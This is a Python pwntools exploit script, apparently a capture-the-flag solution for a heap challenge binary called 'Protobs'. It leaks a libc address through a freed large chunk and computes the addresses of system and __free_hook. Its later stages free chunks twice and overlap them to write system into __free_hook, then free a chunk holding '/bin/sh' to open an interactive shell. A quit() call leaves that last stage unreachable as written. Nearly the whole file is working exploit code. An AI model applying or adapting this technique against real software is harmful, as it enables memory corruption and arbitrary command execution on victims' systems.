  1. #!/usr/bin/env python
  2.  
  3. from pwn import *
# Echo every send/recv on the pwntools log while the script runs.
context.log_level = 'DEBUG'

debug = True  # NOTE(review): assigned here but never read anywhere in this script

# The target binary and the libc build shipped next to it; the hard-coded
# offsets further down presumably belong to this exact libc build.
p = process('./Protobs')
libc = ELF('./libc.so.6')
# gdb.attach(p, 'heap-analysis')  # attach a debugger at startup when needed
  12.  
  13.  
def create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):
    """Pick menu option 2 and answer every prompt up to the description size.

    Each value is stringified and sent as one line after the prompt the
    target prints for it; the order below mirrors the binary's prompts.
    The description text itself is not sent here. Uses the module-level
    process ``p``; returns nothing.
    """
    prompts = (
        ('~$ ', 2),
        (' [ Game ]: ', game),
        ('[ Contrast ]: ', contrast),
        ('[ Gamma ]: ', gamma),
        ('[ Resolution X-Axis ]: ', x_axis),
        ('[ Resolution Y-Axis ]: ', y_axis),
        ('[ Controller ]: ', controller),
        ('[ Size of Description ]: ', size_description),
    )
    for prompt, value in prompts:
        p.sendlineafter(prompt, str(value))
  23.  
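def create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):
    """Create a config (menu option 2) and also answer the description prompt.

    The first eight prompts are exactly those of ``create_without_desc``, so
    this delegates to it instead of duplicating the sequence, then sends
    ``description`` after '[ Description ]: '. No check is made here that
    ``len(description)`` matches ``size_description``; callers pick both.
    Uses the module-level process ``p``; returns nothing.
    """
    create_without_desc(game, contrast, gamma, x_axis, y_axis, controller, size_description)
    p.sendlineafter('[ Description ]: ', str(description))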
  34.  
  35.  
def list_():
    """Pick menu option 1 and log what the target prints up to the next 'protobs'.

    The captured text is only written to the pwntools log; nothing is
    returned. Uses the module-level process ``p``.
    """
    p.sendlineafter('protobs@player2:~$ ', '1')
    listing = p.recvuntil('protobs')
    log.info("list of configuration : " + listing)
  40.  
def read(idx,description):
    """Pick menu option 3 for config ``idx`` and return the raw reply.

    Returns everything received up to and including the next 'protobs'
    marker, minus its final character. ``description`` is accepted for
    call compatibility but is never used. Not called by the script body,
    which issues option 3 by hand instead. Uses the module-level ``p``.
    """
    p.sendlineafter('protobs@player2:~$ ', '3')
    p.sendlineafter('[ Config Index ]: ', str(idx))
    reply = p.recvuntil('protobs')
    return reply[:-1]
  46.  
  47.  
def delete(idx):
    """Pick menu option 4 and delete the config at index ``idx``.

    Nothing is read back here. Uses the module-level process ``p``.
    """
    p.sendlineafter('~$ ', '4')
    p.sendlineafter('[ Config Index ]: ', str(idx))
  51.  
  52.  
  53.  
  54.  
# --- Stage 1 -----------------------------------------------------------------
# Three configs whose descriptions share one size; per the author's note the
# size is chosen so the chunk falls outside the tcache range.
size = 0x450
for description in ("A" * 0x60, "B" * 511, "C" * 511):
    create_desc("hello", 0, 0, 0, 0, 0, size, description)

# Free the middle one rather than the first or the last.
delete(1)

# One more config with a description size of 0, then read config 1 back by
# hand (the read() helper above is not used for this).
create_without_desc("hello", 0, 0, 0, 0, 0, 0)
list_()
p.sendlineafter('@player2:~$ ', '3')
p.sendlineafter('[ Config Index ]: ', '1')
p.recvuntil('[ Description ]: ')
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. #gef p system
  77. #Cannot access memory at address 0x7fb53ec9ffd0
  78. #gef print __libc_start_main
  79. #Cannot access memory at address 0x7fb53ec73a80
  80. #gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80
# Offsets taken from the gdb session quoted above; they are specific to the
# libc build this script was written against (presumably ./libc.so.6).
libc_offset = 0x001e4ca0
system_offset = 0x0052fd0

free_hook = libc.symbols['__free_hook']

# Six leaked bytes, zero-padded to a little-endian qword.
libc_leak = u64(p.recv(6).ljust(8, '\x00'))
libc_base = libc_leak - libc_offset
system = libc_base + system_offset

for label, value in (("Leak", libc_leak), ("Libc", libc_base), ("system", system)):
    log.info("{}: 0x{:x}".format(label, value))
log.info('__free_hook: ' + hex(free_hook))
  96.  
  97.  
  98.  
list_()

### SECOND PART
# Two 0x180-byte descriptions, a delete, one 0x100-byte description, and a
# second delete of the same index.
for size, description in ((0x180, "A" * 0x180), (0x180, "A" * 0x180)):
    create_desc("hello", 0, 0, 0, 0, 0, size, description)
delete(3)
size, description = 0x100, "A" * 0x100
create_desc("hello", 0, 0, 0, 0, 0, size, description)
delete(3)  # delete config 3 again

# One 0x58-byte and one 0x180-byte description.
for size, description in ((0x58, "A" * 0x58), (0x180, "B" * 0x180)):
    create_desc("hello", 0, 0, 0, 0, 0, size, description)

# NOTE(review): the script ends here; nothing below this call ever runs.
quit()
  132.  
  133.  
# NOTE(review): unreachable — the unconditional quit() above ends the script
# before this point. Kept as the author left it.

# Free both of the most recently created configs.
delete(3)
delete(4)

# Request the smaller one again; the author notes this is also where the
# '/bin/sh\x00' text for the final step is placed.
size = 0x58
description = '/bin/sh\x00' + 'A' * 0x50
create_desc("hello", 0, 0, 0, 0, 0, size, description)  # chunk A

# Per the author's note the neighbouring chunk's size field has changed, so
# it is freed again right away.
delete(5)

size = 0x180
description = 'C' * 0x180
create_desc("hello", 0, 0, 0, 0, 0, size, description)  # chunk B

delete(7)

# Three 0xf0-byte descriptions: the first starts with free_hook, the last
# with the computed system address.
size = 0xf0
for description in (p64(free_hook) + 'D' * 0xe8, 'E' * 0xf0, p64(system) + 'F' * 0xe8):
    create_desc("hello", 0, 0, 0, 0, 0, size, description)

# Free the config whose description starts with '/bin/sh\x00'.
delete(4)

p.interactive()